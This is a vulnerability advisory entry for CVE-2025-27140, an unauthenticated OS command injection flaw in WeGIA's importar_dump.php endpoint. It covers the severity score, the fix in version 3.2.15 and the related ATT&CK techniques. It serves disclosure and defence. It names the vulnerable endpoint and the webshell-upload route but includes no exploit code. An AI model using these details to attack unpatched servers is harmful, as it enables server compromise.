CVE-2025-27140
Published: 24 February 2025
Description
Adversaries may backdoor web servers with web shells to establish persistent access to systems.
Security Summary
CVE-2025-27140 is an OS Command Injection vulnerability (CWE-78, CWE-284) in the WeGIA web application, a manager for charitable institutions. The flaw affects versions prior to 3.2.15 and is located in the `importar_dump.php` endpoint, where inadequate input sanitization on a file move command enables attackers to inject and execute arbitrary operating system commands remotely.
With a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), the vulnerability is exploitable by any unauthenticated attacker accessible over the network, requiring low complexity and no user interaction. Exploitation allows remote code execution, including webshell uploads by manipulating the temporary file move operation, potentially leading to full server compromise with high impacts on confidentiality, integrity, and availability.
Version 3.2.15 of WeGIA patches the issue. Additional mitigation details are provided in the GitHub security advisory (GHSA-xw6w-x28r-2p5c) and the specific patching commit (7d0df8c9a0b8b7d6862bbc23dc729d73e39672a1).
Details
- CWE(s)
Affected Products
MITRE ATT&CK Enterprise Techniques
Why these techniques?
OS command injection in public-facing web app directly enables remote exploitation (T1190), arbitrary command execution via Unix shell (T1059.004), and webshell uploads/deployment (T1505.003).